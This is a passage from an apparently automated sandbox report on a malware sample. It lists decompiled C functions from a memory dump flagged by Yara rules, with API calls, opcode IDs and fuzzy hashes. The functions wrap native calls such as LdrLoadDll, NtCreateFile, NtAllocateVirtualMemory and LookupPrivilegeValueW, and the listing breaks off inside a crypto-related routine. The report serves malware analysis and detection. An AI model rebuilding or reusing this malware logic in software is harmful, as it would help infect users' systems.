                                      • Instruction Fuzzy Hash: CE214DB22052487FDB14DF99DC91EEB77ADEF88360F148589FA599B241C630E811CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C820( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CC40(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CEC0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B070(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                      0x0040acec
                                      0x0040acef
                                      0x0040acf4
                                      0x0040acf9
                                      0x0040ad03
                                      0x0040ad08
                                      0x0040ad0b
                                      0x0040ad0d
                                      0x0040ad15
                                      0x0040ad1a
                                      0x0040ad1a
                                      0x0040ad21
                                      0x0040ad29
                                      0x0040ad2c
                                      0x0040ad2e
                                      0x0040ad42
                                      0x00000000
                                      0x0040ad44
                                      0x0040ad4a
                                      0x0040acfe
                                      0x0040acfe
                                      0x0040acfe

                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                      • Instruction ID: a31c2487d958de86685633fd431b3ef9c8f0d30197873f4edf114e6b439d7a00
                                      • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                      • Instruction Fuzzy Hash: A2015EB5D4020DBBDB10EBA5DC82FDEB7799B54308F0041AAE908A7281F634EB54CB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00419F2B, Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00419F2B(intOrPtr _a3, HANDLE* _a7, long _a11, struct _EXCEPTION_RECORD _a15, struct _ERESOURCE_LITE _a19, struct _GUID _a23, long _a27, long _a31, long _a35, long _a39, void* _a43, long _a47) {
				long _t22;
				void* _t32;

				_t16 = _a3;
				_t3 = _t16 + 0xc40; // 0xc40
				E0041AB30(_t32, _a3, _t3,  *((intOrPtr*)(_a3 + 0x10)), 0, 0x28);
				_t22 = NtCreateFile(_a7, _a11, _a15, _a19, _a23, _a27, _a31, _a35, _a39, _a43, _a47); // executed
				return _t22;
			}





                                      0x00419f33
                                      0x00419f3f
                                      0x00419f47
                                      0x00419f7d
                                      0x00419f81

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F7D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: d941d054b038018d385d8470e013146b001cb578c4865166e1bb7414cb306931
                                      • Instruction ID: fecbaf403caf5582601448b7ae90e1c180a54362887b383e4fbedc76d2b35fb6
                                      • Opcode Fuzzy Hash: d941d054b038018d385d8470e013146b001cb578c4865166e1bb7414cb306931
                                      • Instruction Fuzzy Hash: 5B01BDB2215208AFCB48CF89DC95EEB37E9AF8C754F158248FA0D97241D630F851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00419F30(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AB30(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                      0x00419f3f
                                      0x00419f47
                                      0x00419f7d
                                      0x00419f81

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F7D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction ID: 961861021b5599f6e321fa2eb4d652485a26ebd9b99d875dc12ce75f1520402c
                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction Fuzzy Hash: 3DF0BDB2215208ABCB08CF89DC95EEB77ADAF8C754F158248BA0D97241C630F8518BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A110, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A110(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AB30(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                      0x0041a11f
                                      0x0041a127
                                      0x0041a149
                                      0x0041a14d

                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD04,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A149
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction ID: 37a8c631670896842b218247a062c4f669cdd6b33082669530ec9f00ac69b820
                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction Fuzzy Hash: 2BF015B2210208ABCB14DF89CC81EEB77ADAF88754F118249BE0897241C630F811CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A060(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041AB30(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                      0x0041a063
                                      0x0041a066
                                      0x0041a06f
                                      0x0041a077
                                      0x0041a085
                                      0x0041a089

                                      APIs
                                      • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A085
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction ID: 6cd8388973e83edfd6cfca07806e1d74deb588f8289630df2fc4ecf908b9aac5
                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction Fuzzy Hash: 48D01776200214ABD710EB99CC85FE77BADEF48760F154599BA189B242C530FA1086E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A05B, Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A05B(void* __edx, intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t14;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041AB30(_t14, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                      0x0041a063
                                      0x0041a066
                                      0x0041a06f
                                      0x0041a077
                                      0x0041a085
                                      0x0041a089

                                      APIs
                                      • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A085
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: cd4a82c833f8e4308a420f4afe65fef3e983b8e8ecd01de7d097f11835553ad5
                                      • Instruction ID: 942a3163a4949b1880789afcc9a77b8bdd441f1391aee34dd461114b3f1d418a
                                      • Opcode Fuzzy Hash: cd4a82c833f8e4308a420f4afe65fef3e983b8e8ecd01de7d097f11835553ad5
                                      • Instruction Fuzzy Hash: 38D02BA940D3C00FC720EAB465D30C3BF40EF412187145B8FD4D40B203D128961953D1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409A90, Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 90%
                                      			E00409A90(void* __eax, void* __ebx, void* __edx, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t28;
				void* _t35;
				void* _t37;
				void* _t38;
				void* _t44;
				void* _t58;
				intOrPtr* _t60;
				void* _t63;
				void* _t65;
				void* _t66;
				void* _t67;

				asm("in al, dx");
				 *((intOrPtr*)(__ebx + 0x56)) =  *((intOrPtr*)(__ebx + 0x56)) + __edx;
				_t60 = _a4;
				_t44 = 0; // executed
				_t28 = E00407E80(_t60,  &_v24); // executed
				_t65 = _t63 + 9;
				if(_t28 != 0) {
					E00408090( &_v24,  &_v840);
					_t66 = _t65 + 8;
					do {
						E0041B9E0( &_v284, 0x104);
						_t55 =  &_v284;
						E0041C050( &_v284,  &_v804);
						_t67 = _t66 + 0x10;
						_t58 = 0x4f;
						while(1) {
							_t35 = E00414DC0(_t44, _t55, E00414D60(_t60, _t58),  &_v284);
							_t67 = _t67 + 0x10;
							if(_t35 != 0) {
								break;
							}
							_t58 = _t58 + 1;
							if(_t58 <= 0x62) {
								continue;
							} else {
							}
							goto L9;
						}
						_t11 = _t60 + 0x14; // 0xffffe045
						 *(_t60 + 0x474) =  *(_t60 + 0x474) ^  *_t11;
						_t44 = 1;
						L9:
						_t37 = E004080C0( &_v24,  &_v840);
						_t66 = _t67 + 8;
					} while (_t37 != 0 && _t44 == 0);
					_t38 = E00408140(_t60,  &_v24); // executed
					if(_t44 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t38 - 0 + _t38;
						 *((intOrPtr*)(_t60 + 0x55c)) =  *((intOrPtr*)(_t60 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t60 + 0x31)) =  *((intOrPtr*)(_t60 + 0x31)) + _t44;
					_t22 = _t60 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t60 + 0x32)) =  *((intOrPtr*)(_t60 + 0x32)) +  *_t22 + 1;
					return 1;
				} else {
					return _t28;
				}
			}



















                                      0x00409a94
                                      0x00409a98
                                      0x00409a9b
                                      0x00409aa3
                                      0x00409aa5
                                      0x00409aaa
                                      0x00409aaf
                                      0x00409ac2
                                      0x00409ac7
                                      0x00409ad0
                                      0x00409adc
                                      0x00409ae8
                                      0x00409aef
                                      0x00409af4
                                      0x00409af7
                                      0x00409b00
                                      0x00409b12
                                      0x00409b17
                                      0x00409b1c
                                      0x00000000
                                      0x00000000
                                      0x00409b1e
                                      0x00409b22
                                      0x00000000
                                      0x00000000
                                      0x00409b24
                                      0x00000000
                                      0x00409b22
                                      0x00409b26
                                      0x00409b29
                                      0x00409b2f
                                      0x00409b31
                                      0x00409b3c
                                      0x00409b41
                                      0x00409b44
                                      0x00409b51
                                      0x00409b5c
                                      0x00409b5e
                                      0x00409b64
                                      0x00409b68
                                      0x00409b6b
                                      0x00409b6b
                                      0x00409b72
                                      0x00409b75
                                      0x00409b7a
                                      0x00409b87
                                      0x00409ab1
                                      0x00409ab6
                                      0x00409ab6

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0327286b03ad3413f637a2475f25f286d9bf62369b9ecfde997da3914e589c74
                                      • Instruction ID: 432e1ce9d525f57aefaca7daa4fe6280bf22d9d084bd04ba996dfdd8e8b53d12
                                      • Opcode Fuzzy Hash: 0327286b03ad3413f637a2475f25f286d9bf62369b9ecfde997da3914e589c74
                                      • Instruction Fuzzy Hash: 4F210CB2D4020857CB25D665AD42BEF737CAB54318F04017FE949A3182F638BE49CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 82%
                                      			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041BA30( &_v67, 0, 0x3f);
				E0041C5D0( &_v68, 3);
				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 != 0) {
						L4:
						return _t14;
					}
					_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					goto L4;
				}
				return _t13;
			}












                                      0x004082f0
                                      0x004082ff
                                      0x00408303
                                      0x0040830e
                                      0x0040831e
                                      0x0040832e
                                      0x00408333
                                      0x0040833a
                                      0x0040833d
                                      0x0040834a
                                      0x0040834c
                                      0x0040834e
                                      0x0040836d
                                      0x00000000
                                      0x0040836d
                                      0x0040836b
                                      0x00000000
                                      0x0040836b
                                      0x00408372

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: 0bfa4e74d4fa1a6ebe56472b901301c3cf37ddf70bb540388544bf445b19770a
                                      • Instruction ID: 1050077c77294267169ebb916dfae3a1405fb9879d8789690f6f999e3cf74240
                                      • Opcode Fuzzy Hash: 0bfa4e74d4fa1a6ebe56472b901301c3cf37ddf70bb540388544bf445b19770a
                                      • Instruction Fuzzy Hash: AD01D831A8032877E720A6959C03FFE771C6B40F54F044019FF04BA1C1E6A8690546EA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040ACC3, Relevance: 1.6, APIs: 1, Instructions: 53libraryloaderCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 68%
                                      			E0040ACC3(void* __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v540;
				void* _t18;
				struct _OBJDIR_INFORMATION _t20;
				struct _OBJDIR_INFORMATION _t21;
				void* _t38;
				void* _t40;
				void* _t41;

				asm("rol dword [edi], 0x64");
				asm("lodsd");
				asm("in eax, 0x71");
				asm("jecxz 0x3a");
				_push(0xffffffb2);
				asm("repne aam 0x55");
				_v12 =  &_v540;
				_t18 = E0041C820( &_v16, 0x104, _a4);
				_t40 = _t38 - 0x214 + 0xc;
				if(_t18 != 0) {
					_t20 = E0041CC40(__eflags, _v8);
					_t41 = _t40 + 4;
					__eflags = _t20;
					if(_t20 != 0) {
						E0041CEC0( &_v12, 0);
						_t41 = _t41 + 8;
					}
					_t21 = E0041B070(_v8);
					_v16 = _t21;
					__eflags = _t21;
					if(_t21 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						_t21 = _v16;
					}
					return _t21;
				} else {
					return _t18;
				}
			}













                                      0x0040acc4
                                      0x0040acc7
                                      0x0040acc8
                                      0x0040acca
                                      0x0040accc
                                      0x0040acce
                                      0x0040acec
                                      0x0040acef
                                      0x0040acf4
                                      0x0040acf9
                                      0x0040ad03
                                      0x0040ad08
                                      0x0040ad0b
                                      0x0040ad0d
                                      0x0040ad15
                                      0x0040ad1a
                                      0x0040ad1a
                                      0x0040ad21
                                      0x0040ad29
                                      0x0040ad2c
                                      0x0040ad2e
                                      0x0040ad42
                                      0x0040ad44
                                      0x0040ad44
                                      0x0040ad4a
                                      0x0040acfb
                                      0x0040acfe
                                      0x0040acfe

                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: c643e5a7101b6301e02dd2fc1abc1c093126a2eb5aeaaf4f0c4c2ac19f028c65
                                      • Instruction ID: 5cf5732e3ed881d0774384f91f264e9a8e51cdfc8d68250ffbe9ad6f69dea3f9
                                      • Opcode Fuzzy Hash: c643e5a7101b6301e02dd2fc1abc1c093126a2eb5aeaaf4f0c4c2ac19f028c65
                                      • Instruction Fuzzy Hash: 7C01C4B5D4020EBBDB00DB90DC41FDEB7759F14308F0082A9E909AB281F734DA58CB96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A396, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 58%
                                      			E0041A396(void* __eax, void* __ebx, intOrPtr _a8, WCHAR* _a12, WCHAR* _a16, struct _LUID* _a20) {
				int _t13;
				void* _t21;

				asm("fidiv word [edi+ebp+0x79634c3c]");
				asm("in al, 0x55");
				_t10 = _a8;
				E0041AB30(_t21, _a8, _a8 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
				_t13 = LookupPrivilegeValueW(_a12, _a16, _a20); // executed
				return _t13;
			}





                                      0x0041a397
                                      0x0041a39f
                                      0x0041a3a3
                                      0x0041a3ba
                                      0x0041a3d0
                                      0x0041a3d4

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3D0
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 0092910a6a993081ae75a8177ce6f567b3177711a327671e0f260de71b776c99
                                      • Instruction ID: a1aef3864a9d7ffd04f20a5792a40255e6d7a7427b3fdfd879a57793a50c9959
                                      • Opcode Fuzzy Hash: 0092910a6a993081ae75a8177ce6f567b3177711a327671e0f260de71b776c99
                                      • Instruction Fuzzy Hash: 00E06DB12002086BC720DF49CC85FEB77A9EF85714F008269FA085B282CA34E81187E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A240, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A240(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AB30(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                      0x0041a24f
                                      0x0041a257
                                      0x0041a26d
                                      0x0041a271

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A26D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                      • Instruction ID: 8b4701b4f03220052e2b3b5ed4c672ef58e2eb60ff823c8fb6afa074398e137c
                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                      • Instruction Fuzzy Hash: DCE04FB12102046BD714DF59CC45EE777ADEF88750F014559FE0857241C630F910CAF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A200, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A200(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041AB30(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                      0x0041a217
                                      0x0041a22d
                                      0x0041a231

                                      APIs
                                      • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A22D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                      • Instruction ID: 4224f920e4464a65d08b1d76aaa125f94db740d8927d38e6c7d6b62f4195d12c
                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                      • Instruction Fuzzy Hash: 58E012B1210208ABDB14EF99CC41EA777ADAF88664F118559BA085B242C630F9118AB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A23D, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A23D(void* __eax, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t13;
				void* _t18;

				_t10 = _a4;
				_t5 = _t10 + 0xc74; // 0xc74
				E0041AB30(_t18, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t13 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t13;
			}





                                      0x0041a243
                                      0x0041a24f
                                      0x0041a257
                                      0x0041a26d
                                      0x0041a271

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A26D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: 8bbf406e21e26b4067642d923ac3f986a14ef3468521b07945d1f48fdf8158b9
                                      • Instruction ID: fee5f880d4063e6e36d3b59c46efc7fb5b2e48fa8f72d60f72a6f6dc81d289ea
                                      • Opcode Fuzzy Hash: 8bbf406e21e26b4067642d923ac3f986a14ef3468521b07945d1f48fdf8158b9
                                      • Instruction Fuzzy Hash: 85E09AB1200200ABD714DF55CC44EE737ADAF88350F004249B90C97241C230E9118AA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A3A0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A3A0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AB30(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                      0x0041a3ba
                                      0x0041a3d0
                                      0x0041a3d4

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3D0
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                      • Instruction ID: 9e479b2eaf60326b59b5a15a73b63e8f9b290ab663b6f1255dfa49a1ae2fc0e3
                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                      • Instruction Fuzzy Hash: DFE01AB12002086BDB10DF49CC85EE737ADAF88650F018155BA0857241C934F8118BF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A280, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A280(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AB30(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                      0x0041a283
                                      0x0041a29a
                                      0x0041a2a8

                                      APIs
                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2A8
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID:
                                      • API String ID: 621844428-0
                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                      • Instruction ID: ec4c192c261470033b7d3fff11050ba2ce0bed15fbfecc5592b4580303735d53
                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                      • Instruction Fuzzy Hash: 29D017726142187BD620EB99CC85FD777ACDF487A0F0181A9BA1C6B242C531BA108AE1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 00409E40, Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 73%
                                      			E00409E40(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
